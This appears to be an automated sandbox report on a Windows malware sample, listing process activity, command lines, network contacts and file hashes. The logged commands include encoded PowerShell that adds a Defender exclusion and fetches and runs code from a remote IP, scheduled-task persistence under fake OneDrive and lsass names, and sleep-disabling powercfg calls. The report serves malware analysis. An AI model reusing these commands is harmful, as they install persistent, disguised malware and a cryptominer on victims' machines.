PID 4172 wrote to memory of 5024 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 4172 wrote to memory of 3392 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 4172 wrote to memory of 3392 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 4172 wrote to memory of 3392 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 3008 wrote to memory of 2040 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3008 wrote to memory of 2040 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3008 wrote to memory of 1848 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3008 wrote to memory of 1848 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3008 wrote to memory of 4848 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3008 wrote to memory of 4848 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3008 wrote to memory of 4680 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3008 wrote to memory of 4680 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3392 wrote to memory of 640 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 3392 wrote to memory of 640 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 3392 wrote to memory of 640 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 1584 wrote to memory of 1224 N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe C:\Windows\System32\conhost.exe
PID 3392 wrote to memory of 4560 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe
PID 3392 wrote to memory of 4560 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe
PID 3392 wrote to memory of 4560 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe
PID 3392 wrote to memory of 4608 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\cmd.exe
PID 3392 wrote to memory of 4608 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\cmd.exe
PID 3392 wrote to memory of 4608 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\cmd.exe
PID 4608 wrote to memory of 624 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4608 wrote to memory of 624 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4608 wrote to memory of 624 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1584 wrote to memory of 3304 N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe C:\Windows\System32\conhost.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe

"C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBvAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwByAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBmAGkAbABlAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Users\Admin\AppData\Roaming\OneDrive.exe

"C:\Users\Admin\AppData\Roaming\OneDrive.exe"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Users\Admin\AppData\Roaming\dllhost.exe

"C:\Users\Admin\AppData\Roaming\dllhost.exe"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "OneDrive"

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

C:\Users\Admin\AppData\Roaming\lsass.exe

"C:\Users\Admin\AppData\Roaming\lsass.exe"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\SysWOW64\schtasks.exe

"schtasks.exe" /create /tn OneDrive /tr "C:\ProgramData\lsass\lsass.exe" /st 07:52 /du 23:59 /sc daily /ri 1 /f

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\ProgramData\lsass\lsass.exe

"C:\ProgramData\lsass\lsass.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp1CFE.tmp.bat""

C:\Windows\SysWOW64\timeout.exe

timeout 7

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

Network

Country  Destination          Domain                       Proto
US       8.8.8.8:53           240.221.184.93.in-addr.arpa  udp
RU       62.204.41.23:80                                   tcp
RU       62.204.41.23:80      62.204.41.23                 tcp
RU       62.204.41.23:80      62.204.41.23                 tcp
US       8.8.8.8:53           23.41.204.62.in-addr.arpa    udp
US       8.8.8.8:53           217.106.137.52.in-addr.arpa  udp
US       117.18.232.240:80                                 tcp
US       93.184.221.240:80                                 tcp
US       93.184.220.29:80                                  tcp
US       93.184.220.29:80                                  tcp
US       8.8.8.8:53           76.32.126.40.in-addr.arpa    udp
US       8.8.8.8:53           95.221.229.192.in-addr.arpa  udp
US       8.8.8.8:53           ipinfo.io                    udp
US       34.117.59.81:80      ipinfo.io                    tcp
US       8.8.8.8:53           81.59.117.34.in-addr.arpa    udp
RU       62.204.41.23:80      62.204.41.23                 tcp
FR       40.79.141.153:443                                 tcp
US       8.8.8.8:53           maper.info                   udp
DE       148.251.234.93:443   maper.info                   tcp
US       8.8.8.8:53           93.234.251.148.in-addr.arpa  udp
US       8.8.8.8:53           138.32.126.40.in-addr.arpa   udp
US       8.8.8.8:53           154.239.44.20.in-addr.arpa   udp
US       117.18.232.240:80                                 tcp
US       117.18.232.240:80                                 tcp
US       8.8.8.8:53           86.23.85.13.in-addr.arpa     udp
US       8.8.8.8:53           18.31.95.13.in-addr.arpa     udp
NL       173.223.113.164:443                               tcp
US       8.8.8.8:53           pool.hashvault.pro           udp
DE       45.76.89.70:80       pool.hashvault.pro           tcp
US       8.8.8.8:53           70.89.76.45.in-addr.arpa     udp
US       8.8.8.8:53           86.8.109.52.in-addr.arpa     udp
US       8.8.8.8:53           232.168.11.51.in-addr.arpa   udp
NL       173.223.113.131:80                                tcp
US       131.253.33.203:80                                 tcp
US       93.184.221.240:80                                 tcp

Files

memory/1620-133-0x0000000000E00000-0x0000000000E26000-memory.dmp

memory/1540-135-0x0000017735260000-0x0000017735270000-memory.dmp

memory/1540-136-0x0000017735260000-0x0000017735270000-memory.dmp

memory/4172-137-0x00000255B1E90000-0x00000255B1EA0000-memory.dmp

memory/2616-138-0x0000022B20140000-0x0000022B20150000-memory.dmp

memory/4172-139-0x00000255B1E90000-0x00000255B1EA0000-memory.dmp

memory/2616-140-0x0000022B20140000-0x0000022B20150000-memory.dmp

memory/2028-141-0x000001A8B3E40000-0x000001A8B3E50000-memory.dmp

memory/2028-142-0x000001A8B3E40000-0x000001A8B3E50000-memory.dmp

memory/1540-153-0x00000177351B0000-0x00000177351D2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dgfbp3jq.zeu.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4172-183-0x00000255B1E90000-0x00000255B1EA0000-memory.dmp

memory/2616-182-0x0000022B20140000-0x0000022B20150000-memory.dmp

memory/2028-184-0x000001A8B3E40000-0x000001A8B3E50000-memory.dmp

memory/1964-185-0x0000000000400000-0x000000000040C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6622ed5f8592ea827a26d5608f8fec3f
SHA1 e4360bdbaba62948776e4efba19120ecef7b0cbe
SHA256 c62f098bc2f7f95c2714f975915712a196bbd5cf59b577f51778db4daa546661
SHA512 c3da031cd6ffb73cc469fa128b89d56d920f467775668787361abc3c86bddee295a9356dfee8a106f697fcab43ce573172308d6f60779de2d6529c4ff614a07d

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

memory/1964-189-0x00000000051A0000-0x0000000005206000-memory.dmp

memory/1964-190-0x00000000052B0000-0x000000000534C000-memory.dmp

memory/1964-191-0x0000000005350000-0x00000000053B6000-memory.dmp

memory/1964-193-0x00000000058E0000-0x00000000058F0000-memory.dmp

memory/4172-195-0x00000255B1E90000-0x00000255B1EA0000-memory.dmp

memory/4172-196-0x00000255B1E90000-0x00000255B1EA0000-memory.dmp

memory/2028-197-0x000001A8B3E40000-0x000001A8B3E50000-memory.dmp

memory/2028-198-0x000001A8B3E40000-0x000001A8B3E50000-memory.dmp

memory/4172-200-0x00000255B1E90000-0x00000255B1EA0000-memory.dmp

memory/2028-201-0x000001A8B3E40000-0x000001A8B3E50000-memory.dmp

C:\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

memory/1964-208-0x00000000058E0000-0x00000000058F0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6622ed5f8592ea827a26d5608f8fec3f
SHA1 e4360bdbaba62948776e4efba19120ecef7b0cbe
SHA256 c62f098bc2f7f95c2714f975915712a196bbd5cf59b577f51778db4daa546661
SHA512 c3da031cd6ffb73cc469fa128b89d56d920f467775668787361abc3c86bddee295a9356dfee8a106f697fcab43ce573172308d6f60779de2d6529c4ff614a07d

C:\Users\Admin\AppData\Roaming\dllhost.exe

MD5 888bfc5a63177bdc5aaa1429eca8e632
SHA1 3eca9ed178f35a94524a17356a60702d8d5d2e69
SHA256 fc233bc51158c9250a005cab1d7e3b200722a675e392e799b11a5eef6503339c
SHA512 c95f454d559038393d55a7afc889e675ede6a8f5cdecf238f5b09ce8e0a88adc4c7e1d711c3c23469e086fe4e7beb6655b1810a5b085b137495c8db4890749ac

C:\Users\Admin\AppData\Roaming\dllhost.exe

MD5 888bfc5a63177bdc5aaa1429eca8e632
SHA1 3eca9ed178f35a94524a17356a60702d8d5d2e69
SHA256 fc233bc51158c9250a005cab1d7e3b200722a675e392e799b11a5eef6503339c
SHA512 c95f454d559038393d55a7afc889e675ede6a8f5cdecf238f5b09ce8e0a88adc4c7e1d711c3c23469e086fe4e7beb6655b1810a5b085b137495c8db4890749ac

C:\Users\Admin\AppData\Roaming\dllhost.exe

MD5 888bfc5a63177bdc5aaa1429eca8e632
SHA1 3eca9ed178f35a94524a17356a60702d8d5d2e69
SHA256 fc233bc51158c9250a005cab1d7e3b200722a675e392e799b11a5eef6503339c
SHA512 c95f454d559038393d55a7afc889e675ede6a8f5cdecf238f5b09ce8e0a88adc4c7e1d711c3c23469e086fe4e7beb6655b1810a5b085b137495c8db4890749ac

memory/3788-229-0x000001CDC8E30000-0x000001CDC8E40000-memory.dmp

memory/3788-230-0x000001CDC8E30000-0x000001CDC8E40000-memory.dmp

memory/5024-231-0x0000000000400000-0x000000000058B000-memory.dmp

C:\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

memory/3608-235-0x00007FF7EC980000-0x00007FF7ED34A000-memory.dmp

C:\Users\Admin\AppData\Roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\Users\Admin\AppData\Roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

memory/3392-247-0x0000000000540000-0x0000000000960000-memory.dmp

memory/3392-248-0x0000000000540000-0x0000000000960000-memory.dmp

memory/3392-249-0x0000000000540000-0x0000000000960000-memory.dmp

memory/3392-250-0x0000000006C90000-0x0000000007234000-memory.dmp

memory/2600-251-0x00000202B5A10000-0x00000202B5A20000-memory.dmp

memory/3392-257-0x00000000067D0000-0x0000000006862000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8eba69a0f1e0e4422f4c64d92aa7bdff
SHA1 f30d4b77a12b3f341ff509beac91d29ede9ea5a6
SHA256 68408a00cbd6c15bec32c86d05dddea1e0e1f7adc16536ba244d2a947ff670a4
SHA512 10ee30f9f650085de64a4bc50657ecaf7290e2913fa0f92aca165044bea7a2c8e4f1e3fdd9643949236e66c75f61e701683e1678bd043e4d2e4532dfefb8f9aa

memory/2600-263-0x00000202B5A10000-0x00000202B5A20000-memory.dmp

memory/2600-264-0x00000202B5A10000-0x00000202B5A20000-memory.dmp

memory/2600-265-0x00000202B5A10000-0x00000202B5A20000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 14061e2301a93eea286fc6fb05597df0
SHA1 c2726bc34766b2ea625f863dbe21ec570b4285a7
SHA256 65c70d2563e5cb1c944b59ddd44b9a5576badfebc738934ec9b9f780fb7891cc
SHA512 bd853ec6eca30046143718615aff0032082d4c2a97a7c2032673c7405e373f5554bc843f914cc64b81afdfcfd8de4304136c33a45940d56a1733f917433703fa

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f8d061cb5bbb2559aaf515aec28227a0
SHA1 24251cc79b5c4f61c8154be0a18c5127713c796f
SHA256 ce7532548c92e3d3da457e2e8fa83ad4077a52af322c2b8635ca19cbbdc38269
SHA512 a02b2b0f43fef99513543d3be68c2fcad0dd6e66aa6c63e58f9874a51c27f58cdac79c4d9059a92d6a3e5b5235c9ad294abd2716109335f917e7df092980bf8f

C:\ProgramData\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\ProgramData\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

memory/3392-288-0x0000000000540000-0x0000000000960000-memory.dmp

memory/5024-289-0x0000000000400000-0x000000000058B000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\lsass.exe.log

MD5 24cfd42a8de70b38ed70e1f8cf4eda1c
SHA1 e447168fd38da9175084b36a06c3e9bbde99064c
SHA256 93b740416114e346878801c73e8a8670ff1390d3fa009424b88fafe614a3c5cd
SHA512 5c2daf5328ba99d750e9d0362e84f3a79b7fc8395aa8aa2bc1a01b266583fe1f8352bf0619f985aa72223412d14afa054537739b4941610a1d0f96e7fee2a875

memory/4560-291-0x0000000000910000-0x0000000000D30000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp1CFE.tmp.bat

MD5 aba27fbccbda6d26e5687cef36e16231
SHA1 6ebc699266d8d6db5c9956ed31945645b0d96eb8
SHA256 65667520a92d4ac875561686952ed2d6b70f0506ec6d1417b61656095feaa13d
SHA512 cb44e417e9bc6857ef9faaa0d43e61d837fe521bb150de3dbac609fb51f9f110c3cb9fda14079eb6cdbf5e6c1066f7d7fb104b9d30a4b8a767e587bb48a74c99

memory/4560-292-0x0000000000910000-0x0000000000D30000-memory.dmp

memory/3304-295-0x0000022BF16F0000-0x0000022BF1710000-memory.dmp

memory/1584-296-0x00007FF707870000-0x00007FF70823A000-memory.dmp

memory/4560-297-0x0000000006AA0000-0x0000000006AAA000-memory.dmp

memory/3304-298-0x0000022BF1770000-0x0000022BF17B0000-memory.dmp

memory/1224-300-0x00007FF66C580000-0x00007FF66C5A9000-memory.dmp

memory/4560-301-0x0000000000910000-0x0000000000D30000-memory.dmp

memory/3304-302-0x00007FF6083A0000-0x00007FF608B8F000-memory.dmp

memory/4560-303-0x0000000000910000-0x0000000000D30000-memory.dmp

memory/1224-305-0x00007FF66C580000-0x00007FF66C5A9000-memory.dmp

memory/4560-306-0x0000000000910000-0x0000000000D30000-memory.dmp

memory/3304-307-0x00007FF6083A0000-0x00007FF608B8F000-memory.dmp

memory/4560-310-0x0000000000910000-0x0000000000D30000-memory.dmp

memory/3304-311-0x00007FF6083A0000-0x00007FF608B8F000-memory.dmp

memory/3304-312-0x0000022BF17C0000-0x0000022BF17E0000-memory.dmp

memory/4560-315-0x0000000000910000-0x0000000000D30000-memory.dmp

memory/3304-316-0x00007FF6083A0000-0x00007FF608B8F000-memory.dmp

memory/3304-317-0x0000022BF17C0000-0x0000022BF17E0000-memory.dmp

memory/4560-320-0x0000000000910000-0x0000000000D30000-memory.dmp

memory/3304-321-0x00007FF6083A0000-0x00007FF608B8F000-memory.dmp

memory/4560-324-0x0000000000910000-0x0000000000D30000-memory.dmp

memory/3304-325-0x00007FF6083A0000-0x00007FF608B8F000-memory.dmp

memory/4560-328-0x0000000000910000-0x0000000000D30000-memory.dmp

memory/3304-329-0x00007FF6083A0000-0x00007FF608B8F000-memory.dmp

memory/4560-332-0x0000000000910000-0x0000000000D30000-memory.dmp

memory/3304-333-0x00007FF6083A0000-0x00007FF608B8F000-memory.dmp

memory/4560-336-0x0000000000910000-0x0000000000D30000-memory.dmp

memory/3304-337-0x00007FF6083A0000-0x00007FF608B8F000-memory.dmp

memory/4560-340-0x0000000000910000-0x0000000000D30000-memory.dmp

memory/3304-341-0x00007FF6083A0000-0x00007FF608B8F000-memory.dmp

memory/4560-344-0x0000000000910000-0x0000000000D30000-memory.dmp

memory/3304-345-0x00007FF6083A0000-0x00007FF608B8F000-memory.dmp